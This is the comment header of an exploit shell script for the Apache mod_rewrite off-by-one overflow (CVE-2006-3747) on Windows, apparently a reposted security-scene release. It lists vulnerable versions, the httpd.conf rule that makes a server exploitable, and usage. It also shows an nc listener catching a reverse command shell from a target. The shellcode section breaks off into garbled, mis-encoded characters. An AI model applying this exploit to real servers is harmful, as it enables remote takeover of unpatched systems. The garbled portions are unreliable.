Exploit for Apache mod_rewrite off-by-one(Win32).

[code]#!/bin/sh
# Exploit for Apache mod_rewrite off-by-one(Win32).
#
# by axis <axis@ph4nt0m>
# http://www.ph4nt0m.org
# 2007-04-06
#
# Tested on Apache 2.0.58 (Win32)
# Windows2003 CN SP1
#
# Vulnerable Apache Versions:
# * 1.3 branch: >1.3.28 and <1.3.37
# * 2.0 branch: >2.0.46 and <2.0.59
# * 2.2 branch: >2.2.0 and <2.2.3
#
#
# Vulnerability discovered by Mark Dowd.
# CVE-2006-3747
#
# first POC by jack <jack\x40gulcas\x2Eorg>
# 2006-08-20
# http://www.milw0rm.com/exploits/2237
#
#
#
# to successfully exploit the vuln,there are some conditions
# http://www.vuxml.org/freebsd/dc8 ... f-000c6ec775d9.html
#
#
# some compilers added padding to the stack, so they could not be exploited,like gcc under redhat
#
# for more details about the vuln please see:
# http://www.securityfocus.com/arc ... 3870/100/0/threaded
#
#
# no opcodes needed under windows!
# it will directly run our shellcode
#
# my apache config file
# [httpd.conf]:
# RewriteEngine on
# RewriteRule 1/(.*) $1
# RewriteLog "logs/rewrite.log"
# RewriteLogLevel 3
#
#
# Usage:
# [axis@security-lab2 xploits]$ sh mod_rewrite.sh 10.0.76.141
# mod_rewrite apache off-by-one overflow
#
# [axis@opensystemX axis]$ nc -vv -n -l -p 1154
# listening on [any] 1154 ...
# connect to [x.x.x.111] from (UNKNOWN) [10.0.76.141] 4077
# Microsoft Windows [?㿡? 5.2.3790]
# (C) ?㿨????????D 1985-2003 Microsoft Corp.
#
# D:\Apache\Apache2>exit
# exit
# sent 5, rcvd 100
#
#
#
# shellcode ?Ģadchar??Βբ?Ӄ?ģ?Ƥʵ??ШҪć